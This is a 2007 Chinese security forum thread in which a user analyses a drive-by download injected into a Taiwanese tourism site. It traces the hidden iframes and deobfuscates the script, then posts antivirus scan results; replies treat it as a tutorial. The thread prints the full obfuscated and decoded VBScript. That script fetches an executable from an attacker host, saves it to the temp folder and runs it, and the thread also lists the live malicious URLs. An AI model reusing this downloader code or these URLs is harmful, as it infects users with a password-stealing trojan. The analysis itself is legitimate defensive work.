我也学刺猬

mofunzone

随便找了一个，从avpclub那里
http://www.ilfa.org.tw/
台湾的“休闲农业宜兰旅游网”
在页面最后被iframe

1. <iframe src=http://www.gamaniatw.com/img/love.htm width=0 height=0 frameborder=0></iframe>

复制代码

1. [code]
   
2. <iframe src=http://www.gamaniatw.com/img/3.htm width=0 height=0 frameborder=0></iframe>

复制代码

第一个无法访问，放弃
第二个访问后获得test
然后查看代码

1. <HTM L >
   
2. 
   
3. <SCRIPT LA NGU A GE="Ja v a s  c ri  pt" >
   
4. <!--
   
5. 
   
6. document.wri  te(u   nesca  pe("%3C html%3E% 0D% 0A %3Ct      i tl e%3E  %3C%2F t it le% 3 E   %0 D%0A%3C    he  a   d %3ETes t %2 E %2E%2E %  0D% 0A% 3Cbod   y%3  E%0 D% 0    A %3Cscrip t%20lang   u a ge%3D %22VB Scri p t % 22 % 3E% 0D  %0A % 0D %0A  on%20 er ro   r  %20re  sume%2 0ne xt % 0D%0 A%0D%0A oqf n0 b1q824251 2nlkjngkjas    f dhupi1n g3 r gt%3D%22S h ell %  2E A ppl  icat  i  on   %  22%0D% 0 A % 0 D % 0A% 27 %20  due  %20to%20h ow%20aj ax% 2    0w orks%2C%20 t  h e%2    0f ile% 20M  UST  %20 be%20wi thin%20the %20 s am e%2 0  l   o cal %20d   omain%0D  % 0A  d l% 20%3 D %2 0% 2 2  http%3A%2  F%  2F520% 2Egam  an i atw% 2Ecom %2F520% 2 Ee     x  e%22% 0D % 0A%0D% 0A %  2 7 %20 c r ea   te %   20a do dbst ream%20o bje ct %     0D% 0 ASet %  2 0df   %2 0 %   3 D%2 0d  o cu ment%2 E  cr e ateEl   e  ment % 28%22ob j e   ct %2 2%29%0D%0A d f %2 Ese tAt t ri b ut e %20%22c l as  sid%22  % 2C%     2  0%2  2c  l  si d % 3ABD96C556% 2D   65A 3%2 D11 D 0 %2D  98 3 A% 2D00 C04 FC29E36 %2 2%   0D% 0 Astr%3D%2  2 M  i cr   o s oft  %2EXM  LHTTP% 22  %0  D %0 ASe   t %  20 x%20  % 3D%20df %2ECre ateO  bjec t%2 8  st r  %2   C%2 2% 22% 2   9   % 0  D%    0A%0  D%     0 A a1 %  3   D %  22A d o %2    2  %0D%0Aa2   % 3D %22db% 2E   % 22%0D%   0 Aa  3 %3D%2  2S t r%2 2%0 D%0Aa4%3D%2 2  ea   m %22%0D%0A s  tr1%   3Da1% 26a2%2  6a3 %2 6 a 4 % 0D  %0As t  r5% 3Dstr1%0D  %0Aset %20S %2 0  %3 D%2 0df%2Ecreateobj ec t  %28  st  r  5  % 2  C%22%22%29 %  0D% 0AS%  2Etype    %2 0  %3D %20 1%0 D% 0 A  %0D%0 A%   27%20x m l%2 0 ajax%20req %   0D%0A s tr6%3D %22 G E  T%   2 2   %0D     % 0 Ax% 2E   Open%2 0   str6%2 C  %20dl%2C%20 F a  lse% 0D%0A x%2ES  end % 0 D% 0  A % 0 D%0 A%27%  20Ge t% 2    0 temp% 20d i    recto  r y%2  0an  d% 2  0 create  % 2  0o   u   r% 20des   tination% 20 name%  0D%0 A fna me1  % 3D%22220 8 5% 2 E com%  22%0D%0As  et%20F%20  %   3 D% 20df% 2 Ec  r  eateob je c   t%2  8 %22Scr ipti ng  %2  EF ileS yst e  mO  bject%22 %2C%22%2 2%29%0D%0Aset  %2 0tm   p% 20%3D%20F %2 EGe     tS pec ialFold er%28 2%  2 9%20% 2  7  %2  0Ge t  %20t m  p%20fold er%0 D%0A f na m e 1%  3 D %2 0F%2E   Bui  ld Path %28 tmp%2 Cfname1 % 29% 0D%   0AS %2E open%0D%0A%27%2  0open%2  0ad  od b%20st r e   am %2 0 an d % 2   0  wr it  e% 20conte   nts%20of  % 2  0  req  u e s t%2 0to%20fi le%0D %0A % 2  7%20 like% 20vb s% 2  0dl  % 2  B e xec% 2 0 co de%0D%0  A  S%2    Ew rit e%20 x%2E respo nseBody%     0D %0A%27%2  0S a ves%20it% 20     w  it h%20Cr eateO   ve rwri te %2  0fl ag% 0D%0AS%2 Esa    vetofile%20fname1%2 C2%0D%0  A%0D%0AS  % 2 Eclo se% 0D%0 Aset% 2  0 Q %20  % 3D% 20df%2E create object % 28oqfn0 b1q 8242 512nl     kjn gkj asfd  hupi1  ng 3rgt %2 C% 2 2%22  %29  %0D%0A Q%2 ES hel lExe cut e%2  0fna me1% 2 C% 2 2% 22% 2C%22%22%2C%22op  en%22% 2C0% 0 D  %0A%0D%0A     %3 C%2F sc ri pt %  3E%0D % 0  A%3C  % 2Fb o  dy %3E% 0D%0 A%3C  %2 Fh   ead%3E%0D%0A% 3     C  % 2Fht  ml  %3 E " ))
   
7. //-   -></ SC RIP T>
   
8. < / HTML>

复制代码

之后简单的去掉无聊的空格，得到

1. <HTML>
   
2. 
   
3. <SCRIPTLANGUAGE="Javascript">
   
4. <!--
   
5. 
   
6. document.write(unescape("%3Chtml%3E%0D%0A%3Ctitle%3E%3C%2Ftitle
   
7. %3E%0D%0A%3Chead%3ETest%2E%2E%2E%0D%0A%3Cbody%3E%0D%0A%3C
   
8. script%20language%3D%22VBScript%22%3E%0D%0A%0D%0Aon%20error%20resume%20
   
9. next%0D%0A%0D%0Aoqfn0b1q8242512nlkjngkjasfdhupi1ng3rgt%3D%22Shell%2EApplication%2
   
10. 2%0D%0A%0D%0A%27%20due%20to%20how%20ajax%20works%2C%20the%
    
11. 20file%20MUST%20be%20within%20the%20same%20local%20domain%0D%0Ad
    
12. l%20%3D%20%22http%3A%2F%2F520%2Egamaniatw%2Ecom%2F520%2Eexe
    
13. %22%0D%0A%0D%0A%27%20create%20adodbstream%20object%0D%0ASet
    
14. %20df%20%3D%20document%2EcreateElement%28%22object%22%29%0D%0
    
15. Adf%2EsetAttribute%20%22classid%22%2C%20%22clsid%3ABD96C556%2D65A3
    
16. %2D11D0%2D983A%2D00C04FC29E36%22%0D%0Astr%3D%22Microsoft%2EXMLH
    
17. TTP%22%0D%0ASet%20x%20%3D%20df%2ECreateObject%28str%2C%22%22%2
    
18. 9%0D%0A%0D%0Aa1%3D%22Adao%22%0D%0Aa2%3D%22db%2E%22%0D%0Aa
    
19. 3%3D%22Str%22%0D%0Aa4%3D%22eam%22%0D%0Astr1%3Da1%26a2%26a
    
20. 3%26a4%0D%0Astr5%3Dstr1%0D%0Aset%20S%20%3D%20df%2Ecreateobject%
    
21. 28str5%2C%22%22%29%0D%0AS%2Etype%20%3D%201%0D%0A%0D%0A%27%
    
22. 20xml%20ajax%20req%0D%0Astr6%3D%22GET%22%0D%0Ax%2EOpen%20str6%2
    
23. C%20dl%2C%20False%0D%0Ax%2ESend%0D%0A%0D%0A%27%20Get%20temp%
    
24. 20directory%20and%20create%20our%20destination%20name%0D%0Afname1%3D%
    
25. 2222085%2Ecom%22%0D%0Aset%20F%20%3D%20df%2Ecreateobject%28%22Scri
    
26. pting%2EFileSystemObject%22%2C%22%22%29%0D%0Aset%20tmp%20%3D%20F
    
27. %2EGetSpecialFolder%282%29%20%27%20Get%20tmp%20folder%0D%0Afname1%
    
28. 3D%20F%2EBuildPath%28tmp%2Cfname1%29%0D%0AS%2Eopen%0D%0A%27%20
    
29. open%20adodb%20stream%20and%20write%20contents%20of%20request%20to%
    
30. 20file%0D%0A%27%20like%20vbs%20dl%2Bexec%20code%0D%0AS%2Ewrite%20x%
    
31. 2EresponseBody%0D%0A%27%20Saves%20it%20with%20CreateOverwrite%20flag%0D
    
32. %0AS%2Esavetofile%20fname1%2C2%0D%0A%0D%0AS%2Eclose%0D%0Aset%20Q%2
    
33. 0%3D%20df%2Ecreateobject%28oqfn0b1q8242512nlkjngkjasfdhupi1ng3rgt%2C%22%22
    
34. %29%0D%0AQ%2EShellExecute%20fname1%2C%22%22%2C%22%22%2C%22open%2
    
35. 2%2C0%0D%0A%0D%0A%3C%2Fscript%3E%0D%0A%3C%2Fbody%3E%0D%0A%3C%
    
36. 2Fhead%3E%0D%0A%3C%2Fhtml%3E"))
    
37. //--></SCRIPT>
    
38. </HTML>

复制代码

这个时候如果保存antivir已经会报HTML/Dldr.Maran.AU，强 （做下广告）
p.s 我随便切的，想解析的自己下下面的html附件

A-Squared         
Found nothing
AntiVir         
Found HTML/Dldr.Maran.AU
ArcaVir         
Found HTML.JScritp.Lucifer
Avast         
Found nothing
AVG Antivirus         
Found nothing
BitDefender         
Found nothing
ClamAV         
Found nothing
Dr.Web         
Found nothing
F-Prot Antivirus         
Found nothing
F-Secure Anti-Virus         
Found nothing
Fortinet         
Found nothing
Kaspersky Anti-Virus         
Found nothing
NOD32         
Found nothing
Norman Virus Control         
Found nothing
Panda Antivirus         
Found nothing
Rising Antivirus         
Found nothing
VirusBuster         
Found JS.Psyme.DU
VBA32         
Found nothing

之后仔细观看，看见unescape()参数的存在
简单的用unicode解析，得到

1. <html>
   
2. <title></title>
   
3. <head>Test...
   
4. <body>
   
5. <script language="VBScript">
   
6. 
   
7. on error resume next
   
8. 
   
9. oqfn0b1q8242512nlkjngkjasfdhupi1ng3rgt="Shell.Application"
   
10. 
    
11. ' due to how ajax works, the file MUST be within the same local domain
    
12. dl = "http://520.gamaniatw.com/520.exe"
    
13. 
    
14. ' create adodbstream object
    
15. Set df = document.createElement("object")
    
16. df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    
17. str="Microsoft.XMLHTTP"
    
18. Set x = df.CreateObject(str,"")
    
19. 
    
20. a1="Adao"
    
21. a2="db."
    
22. a3="Str"
    
23. a4="eam"
    
24. str1=a1&a2&a3&a4
    
25. str5=str1
    
26. set S = df.createobject(str5,"")
    
27. S.type = 1
    
28. 
    
29. ' xml ajax req
    
30. str6="GET"
    
31. x.Open str6, dl, False
    
32. x.Send
    
33. 
    
34. ' Get temp directory and create our destination name
    
35. fname1="22085.com"
    
36. set F = df.createobject("Scripting.FileSystemObject","")
    
37. set tmp = F.GetSpecialFolder(2) ' Get tmp folder
    
38. fname1= F.BuildPath(tmp,fname1)
    
39. S.open
    
40. ' open adodb stream and write contents of request to file
    
41. ' like vbs dl+exec code
    
42. S.write x.responseBody
    
43. ' Saves it with CreateOverwrite flag
    
44. S.savetofile fname1,2
    
45. 
    
46. S.close
    
47. set Q = df.createobject(oqfn0b1q8242512nlkjngkjasfdhupi1ng3rgt,"")
    
48. Q.ShellExecute fname1,"","","open",0
    
49. 
    
50. </script>
    
51. </body>
    
52. </head>
    
53. </html>

复制代码

样本链接就不用我说了吧，虽然比较老
http://520.gamaniatw.com/520.exe

A-Squared         
Found nothing
AntiVir         
Found TR/PSW.Maran.AU
ArcaVir         
Found nothing
Avast         
Found Win32:Lineage-406
AVG Antivirus         
Found Generic4.CBU
BitDefender         
Found Generic.PWS.Maran.338C67BA
ClamAV         
Found nothing
Dr.Web         
Found Trojan.PWS.Maran
F-Prot Antivirus         
Found nothing
F-Secure Anti-Virus         
Found Trojan-PSW.Win32.Maran.eu
Fortinet         
Found nothing
Kaspersky Anti-Virus         
Found Trojan-PSW.Win32.Maran.eu
NOD32         
Found probably a variant of Win32/PSW.Maran (probable variant)
Norman Virus Control         
Found nothing
Panda Antivirus         
Found Trj/Maran.AR
Rising Antivirus         
Found nothing
VirusBuster         
Found Trojan.PWS.Maran.EK
VBA32         
Found nothing

今天是比较无聊，看刺猬想混个XX会员一时手痒，哈哈，开玩笑开玩笑
抓网马就是这么简单

[ 本帖最后由 mofunzone 于 2007-5-16 19:43 编辑 ]

aoyang

学会抓网马了

dikex

捉网马其实很简单的

miller239

抢刺猬饭碗？
呵呵～都是牛人。。

Object: 520.exe
        In archive: C:\Documents and Settings\Administrator\桌面\520.rar
        Status: Virus detected
        Virus: Trojan-PSW.Win32.Maran.eu (KAV engine), Generic.PWS.Maran.338C67BA (BD-Engine)
Object: 520.rar
        Path: C:\Documents and Settings\Administrator\桌面
        Status: Virus detected
        Virus: Trojan-PSW.Win32.Maran.eu (KAV engine), Generic.PWS.Maran.338C67BA (BD-Engine)

那个html过了。。

九尾野狐

可以作为 抓网马的教程了

呵呵

buycard

unescape是最初级最简单的，连这个也解不了，解密还是别弄了。


稍微挂的有水平的都是ASCII+FSO，解密要会写FSO.

欠妳緈諨

AVAST报了一个

小邪邪

MCAFEE都杀啦

费饭饭

我也来学抓网马，呵呵

bridgewr

微点杀